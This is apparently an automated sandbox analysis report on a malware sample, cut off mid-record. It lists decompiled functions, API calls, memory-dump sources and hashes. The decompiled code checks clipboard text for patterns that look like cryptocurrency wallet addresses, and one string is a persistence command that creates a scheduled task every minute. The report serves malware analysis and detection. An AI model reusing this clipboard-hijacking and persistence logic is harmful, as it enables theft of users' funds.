							if(StrChrW(_t15, _t13) != 0 || StrChrW(_t15, 0x4f) != 0 || StrChrW(_t15, 0x49) != 0) {
								goto L20;
							} else {
								_t8 = StrChrW(_t15, 0x6c);
								if(_t8 != 0) {
									goto L20;
								} else {
									return  &(_t8[0]);
								}
							}
						} else {
							goto L20;
						}
					}
				} else {
					L20:
					return 0;
				}
			}









                                                                                                                                                                                          0x00401ef8
                                                                                                                                                                                          0x00401f04
                                                                                                                                                                                          0x00401f18
                                                                                                                                                                                          0x00401f1c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401f1e
                                                                                                                                                                                          0x00401f1e
                                                                                                                                                                                          0x00401f24
                                                                                                                                                                                          0x00401f28
                                                                                                                                                                                          0x00401f62
                                                                                                                                                                                          0x00401f6e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401f8a
                                                                                                                                                                                          0x00401f8d
                                                                                                                                                                                          0x00401f95
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401f97
                                                                                                                                                                                          0x00401f99
                                                                                                                                                                                          0x00401f99
                                                                                                                                                                                          0x00401f95
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401f28
                                                                                                                                                                                          0x00401f9a
                                                                                                                                                                                          0x00401f9a
                                                                                                                                                                                          0x00401f9d
                                                                                                                                                                                          0x00401f9d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00401809,?,00401CAF), ref: 00401EFB
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00401CAF), ref: 00401F07
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,00401CAF), ref: 00401F66
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00401CAF), ref: 00401F73
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,00401CAF), ref: 00401F80
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00401CAF), ref: 00401F8D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 8a283dcc1fafb251700af5242f731a1eeea3e3d4b9c97067a0a82040f63f5109
                                                                                                                                                                                          • Instruction ID: 842f13b0e6f61bfd151f82261c12b94fa508ce2ba7f017312a929d1c928bf954
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a283dcc1fafb251700af5242f731a1eeea3e3d4b9c97067a0a82040f63f5109
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B116D6114832319DB342A386D88A7F22546BD6755B184C37F206F52F0D33CCD82518E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C62147, Relevance: 9.1, APIs: 6, Instructions: 68stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,02C61A59), ref: 02C6214B
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,02C61A59), ref: 02C62157
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,?,02C61A59), ref: 02C621B6
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00000030,?,?,02C61A59), ref: 02C621C3
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,0000004F,?,00000030,?,?,02C61A59), ref: 02C621D0
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00000049,?,0000004F,?,00000030,?,?,02C61A59), ref: 02C621DD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 34e5242f1b3c15c738e08e41ff9107dc44d7df7da787cb389f94cc33d272342b
                                                                                                                                                                                          • Instruction ID: f63b67586383a52337dc7283bea6f5ac8f640931f8808dd44832dce625e51994
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34e5242f1b3c15c738e08e41ff9107dc44d7df7da787cb389f94cc33d272342b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1711406174916116DB342A286DDCF7E367C6BC25AAB1A4427FF86E40B0D714CFC3918B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410B8E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 0$9
                                                                                                                                                                                          • API String ID: 3120068967-1975997740
                                                                                                                                                                                          • Opcode ID: 71b3785b80bd961fdd65258f3832804ca2939cb562fbb5e92e2a3f59183cd18f
                                                                                                                                                                                          • Instruction ID: e960a11e4ece91178d3a2e8896ec326cb66e4a59b306e649322599f7164a7816
                                                                                                                                                                                          • Opcode Fuzzy Hash: 71b3785b80bd961fdd65258f3832804ca2939cb562fbb5e92e2a3f59183cd18f
                                                                                                                                                                                          • Instruction Fuzzy Hash: DD41F5B1D05228DFDB24CF98D889BEEB7B5BB44304F20859AD009A7241D778AAC1CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407263, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: '$9
                                                                                                                                                                                          • API String ID: 3120068967-1823400153
                                                                                                                                                                                          • Opcode ID: d3611736a4f00d3dc56c7b6daf18abb9b521060ec6e09dd6e3217bacfd76b68f
                                                                                                                                                                                          • Instruction ID: fdf06efbe065a151bc7ca3d8de09cf6a9abfcdffc1ecb06711ebebe3684aa0c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: d3611736a4f00d3dc56c7b6daf18abb9b521060ec6e09dd6e3217bacfd76b68f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F4108B1E045299FDB24CF58C941BAEB7B5FF85314F1080A9D648B7281D3786E81CF5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402039, Relevance: 7.6, APIs: 5, Instructions: 87stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00402039(WCHAR* __ecx) {
				signed int _t4;
				WCHAR* _t8;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;

				_t12 = __ecx;
				_t11 = 0x44;
				if( *__ecx != _t11 || lstrlenW(__ecx) != 0x22) {
					L31:
					return 0;
				} else {
					_t4 =  *(_t12 + 2) & 0x0000ffff;
					if(_t4 == 0x41 || _t4 == 0x42 || _t4 == 0x43 || _t4 == _t11 || _t4 == 0x45 || _t4 == 0x46 || _t4 == 0x47 || _t4 == 0x48 || _t4 == 0x4a || _t4 == 0x4b || _t4 == 0x4c || _t4 == 0x4d || _t4 == 0x4e || _t4 == 0x50 || _t4 == 0x51 || _t4 == 0x52 || _t4 == 0x53 || _t4 == 0x54 || _t4 == 0x55 || _t4 == 0x35 || _t4 == 0x36 || _t4 == 0x37 || _t4 == 0x38 || _t4 == 0x39) {
						_t13 = _t12 + 4;
						if(StrChrW(_t13, 0x30) != 0 || StrChrW(_t13, 0x4f) != 0 || StrChrW(_t13, 0x49) != 0) {
							goto L31;
						} else {
							_t8 = StrChrW(_t13, 0x6c);
							if(_t8 != 0) {
								goto L31;
							}
							return  &(_t8[0]);
						}
					} else {
						goto L31;
					}
				}
			}








                                                                                                                                                                                          0x0040203b
                                                                                                                                                                                          0x0040203f
                                                                                                                                                                                          0x00402043
                                                                                                                                                                                          0x0040210f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402059
                                                                                                                                                                                          0x00402059
                                                                                                                                                                                          0x00402060
                                                                                                                                                                                          0x004020d7
                                                                                                                                                                                          0x004020e3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004020ff
                                                                                                                                                                                          0x00402102
                                                                                                                                                                                          0x0040210a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040210c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402060

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,0040186D,?,00401CAF), ref: 0040204A
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,00401CAF), ref: 004020DB
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00401CAF), ref: 004020E8
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,00401CAF), ref: 004020F5
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00401CAF), ref: 00402102
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 033baab36fa4e63d4656868d84d7ccad315465f935aa9d4d00be32e2960f9c69
                                                                                                                                                                                          • Instruction ID: 466335ad568ae336ba92fb9fe317f6dce376568ae05578ed0c81c2f4d013b137
                                                                                                                                                                                          • Opcode Fuzzy Hash: 033baab36fa4e63d4656868d84d7ccad315465f935aa9d4d00be32e2960f9c69
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D1106B110225211DA3855181FCD63F3D645B4E7A07A80833EB25F86E4EAFCCDC2DA4E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C62289, Relevance: 7.6, APIs: 5, Instructions: 87stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,02C61ABD), ref: 02C6229A
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,?,?,02C61ABD), ref: 02C6232B
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00000030,?,?,?,02C61ABD), ref: 02C62338
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,0000004F,?,00000030,?,?,?,02C61ABD), ref: 02C62345
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00000049,?,0000004F,?,00000030,?,?,?,02C61ABD), ref: 02C62352
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 1dfb8a87e815566c9d5978d19a236094ff7e72a8b195f751a92239c3df4cb982
                                                                                                                                                                                          • Instruction ID: 8dabf1dfc9f8d5580f857da9f5b39cb1fc278058b27f69e8ef9bf25f7690aace
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dfb8a87e815566c9d5978d19a236094ff7e72a8b195f751a92239c3df4cb982
                                                                                                                                                                                          • Instruction Fuzzy Hash: 791107A194A152919B3E1A1D58CC63E2AFC5BCF9987AC0837EE2DE407DD314C3C25257
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401F9E, Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401F9E(WCHAR* __ecx) {
				signed int _t4;
				WCHAR* _t8;
				void* _t11;
				short _t12;
				intOrPtr* _t13;
				WCHAR* _t14;

				_t13 = __ecx;
				if(lstrlenW(__ecx) != 0x5f) {
					L19:
					return 0;
				} else {
					_t11 = 0x38;
					if( *_t13 != _t11) {
						goto L19;
					} else {
						_t4 =  *(_t13 + 2) & 0x0000ffff;
						_t12 = 0x30;
						if(_t4 == 0x41 || _t4 == 0x42 || _t4 == _t12 || _t4 == 0x31 || _t4 == 0x32 || _t4 == 0x33 || _t4 == 0x34 || _t4 == 0x35 || _t4 == 0x36 || _t4 == 0x37 || _t4 == _t11 || _t4 == 0x39) {
							_t14 = _t13 + 4;
							if(StrChrW(_t14, _t12) != 0 || StrChrW(_t14, 0x4f) != 0 || StrChrW(_t14, 0x49) != 0) {
								goto L19;
							} else {
								_t8 = StrChrW(_t14, 0x6c);
								if(_t8 != 0) {
									goto L19;
								} else {
									return  &(_t8[0]);
								}
							}
						} else {
							goto L19;
						}
					}
				}
			}









                                                                                                                                                                                          0x00401f9f
                                                                                                                                                                                          0x00401fab
                                                                                                                                                                                          0x00402035
                                                                                                                                                                                          0x00402038
                                                                                                                                                                                          0x00401fb1
                                                                                                                                                                                          0x00401fb3
                                                                                                                                                                                          0x00401fb7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401fb9
                                                                                                                                                                                          0x00401fb9
                                                                                                                                                                                          0x00401fbf
                                                                                                                                                                                          0x00401fc3
                                                                                                                                                                                          0x00401ffd
                                                                                                                                                                                          0x00402009
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402025
                                                                                                                                                                                          0x00402028
                                                                                                                                                                                          0x00402030
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402032
                                                                                                                                                                                          0x00402034
                                                                                                                                                                                          0x00402034
                                                                                                                                                                                          0x00402030
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401fc3
                                                                                                                                                                                          0x00401fb7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040183B,?,00401CAF), ref: 00401FA2
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,00401CAF), ref: 00402001
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00401CAF), ref: 0040200E
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,00401CAF), ref: 0040201B
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00401CAF), ref: 00402028
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 3e839589a52552755556ab8f22701c2fd0b2083a19dd4434fe127b2f866be211
                                                                                                                                                                                          • Instruction ID: 21b8f5aec0fffbc79c888ae13ffe846aaa01b4b90668c19f07de86945adb2a49
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e839589a52552755556ab8f22701c2fd0b2083a19dd4434fe127b2f866be211
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D01806A14023715DA382A286D4CE7B26585F5A790B58443BEB01F6AF0E3FCCD82A18D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C621EE, Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,02C61A8B), ref: 02C621F2
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,?,02C61A8B), ref: 02C62251
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00000030,?,?,02C61A8B), ref: 02C6225E
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,0000004F,?,00000030,?,?,02C61A8B), ref: 02C6226B
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00000049,?,0000004F,?,00000030,?,?,02C61A8B), ref: 02C62278
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 328b822c4393c529a9a899670a59262547426000f33717c38db6df60201e6aa8
                                                                                                                                                                                          • Instruction ID: fea8747bd611898e270794846a42abec6af706c172346e5c980e488a7ffac52c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 328b822c4393c529a9a899670a59262547426000f33717c38db6df60201e6aa8
                                                                                                                                                                                          • Instruction Fuzzy Hash: B00171E114016215DB742A2CACCCB7E23599FC7D78B1A4427FE46E60F0E318C7CA518B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C61FCC, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 51stringmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FE2
                                                                                                                                                                                          • lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FEF
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,?,02C615D5), ref: 02C62000
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 02C62021
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • /C /create /F /sc minute /mo 1 /tn ", xrefs: 02C61FEE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$AllocFreeGlobalLocal
                                                                                                                                                                                          • String ID: /C /create /F /sc minute /mo 1 /tn "
                                                                                                                                                                                          • API String ID: 3873415381-4285889591
                                                                                                                                                                                          • Opcode ID: 130ea67c3727dbfe4e8bb06d54dfa35f071c00b44640929ded855d708f63130a
                                                                                                                                                                                          • Instruction ID: 0e2accd316f0740cf4790ddd6ead8351873a64eea53320718b967e6aeada0125
                                                                                                                                                                                          • Opcode Fuzzy Hash: 130ea67c3727dbfe4e8bb06d54dfa35f071c00b44640929ded855d708f63130a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3501B575600200EFD7205FA9DC89A6ABAFAEFC8312F18043DA286E3361D7B14941DA51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00419480, Relevance: 7.5, APIs: 5, Instructions: 24filelibraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041948F
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00421DC8), ref: 0041949A
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(00000000), ref: 004194A2
                                                                                                                                                                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004194AA
                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 004194B4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalDeleteEnterEnvironmentErrorFileFreeLastLibraryLoadSectionStrings
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2355528868-0
                                                                                                                                                                                          • Opcode ID: 9f7c975e490926aebf48e2bf078307ce9ea013025e012bc18f92bbb9d763b40d
                                                                                                                                                                                          • Instruction ID: be5c53dd517337924b076f4d2e36b75196b0ade31bde952fcd212899ea8bb193
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f7c975e490926aebf48e2bf078307ce9ea013025e012bc18f92bbb9d763b40d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF08C35945208DFC701EFA0E85DA9A7F74FB0D302F008661EA5587251CB301965CBEA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C61D8B, Relevance: 7.5, APIs: 5, Instructions: 24clipboardCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 02C61D8F
                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 02C61D9C
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 02C61DA9
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 02C61DB6
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 02C61DBC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataOpenWire
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1198520892-0
                                                                                                                                                                                          • Opcode ID: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
                                                                                                                                                                                          • Instruction ID: 7b2c4b9573123fbccf7064afa3b12f5066a46d4c37b8a204b6c6bbf2f1f61c3c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96E086B610152197C2222764BD4CB6FAE78AFC1A5270A0139FF05F2211DB74C90185B4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407250, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 3120068967-2366072709
                                                                                                                                                                                          • Opcode ID: 0ea6146af0f2c26e6f89072181573e13106b90481fae994fd2cb8fba2cd0ab83
                                                                                                                                                                                          • Instruction ID: 7e99398a2989f63ab91d86e5d1f340e94c6fbd712eeb2fe5690cc7a552c25abe
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ea6146af0f2c26e6f89072181573e13106b90481fae994fd2cb8fba2cd0ab83
                                                                                                                                                                                          • Instruction Fuzzy Hash: 104118B1E041299FDB24CF58C941BAEB7B5FF85314F1080AAD548B7281D3786E85CF5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040729E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 3120068967-2366072709
                                                                                                                                                                                          • Opcode ID: f22af67319abfc7469830822f47527434b550f8be6a7b99d64984b1ad6fb31c5
                                                                                                                                                                                          • Instruction ID: be5f340bf6e2c4c7509da247219f0037cb9acdb6af063adddbb9452891412781
                                                                                                                                                                                          • Opcode Fuzzy Hash: f22af67319abfc7469830822f47527434b550f8be6a7b99d64984b1ad6fb31c5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 454128B1E045299FDB24CF48C981BAEB7B5FF85314F0080A9D648B7281D7786E81CF1A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410BD6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 3120068967-2366072709
                                                                                                                                                                                          • Opcode ID: d4d663e6eebe0b419f8463e3a84be00d961852047bb7cb56f8a1413bb460c924
                                                                                                                                                                                          • Instruction ID: 04074a4d55adec1fb7484b132e08c3b3bdfbdf4c825e8fe88e8a3d54cb31c223
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4d663e6eebe0b419f8463e3a84be00d961852047bb7cb56f8a1413bb460c924
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E41C4B1905628DFEB24CF99D889BEEB7B5FB44304F20859AD009A7240D778AAC1CF44
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407247, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 2124759748-2366072709
                                                                                                                                                                                          • Opcode ID: 15e2ea9ed52891bb6a2a2a550db8cc62dd7b9df09e391ea8fb6298cdaec576cf
                                                                                                                                                                                          • Instruction ID: e2ad673a9e1fbcd92f3034303dd506abada369279c597e6f7b0f1569caf1cc2c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 15e2ea9ed52891bb6a2a2a550db8cc62dd7b9df09e391ea8fb6298cdaec576cf
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE4109B1E045299FDB24CF58C941B9EB7B5FB85314F1080E9D648A7281D3786E81CF1A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410B85, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 2124759748-2366072709
                                                                                                                                                                                          • Opcode ID: abbb330f59fefbac0a25802ba133fbee9826849726f9bb39b00a427fd9cde486
                                                                                                                                                                                          • Instruction ID: 370d043033f9b44dbe123085fe21159393ba80c6a027f265584c43808d9c422b
                                                                                                                                                                                          • Opcode Fuzzy Hash: abbb330f59fefbac0a25802ba133fbee9826849726f9bb39b00a427fd9cde486
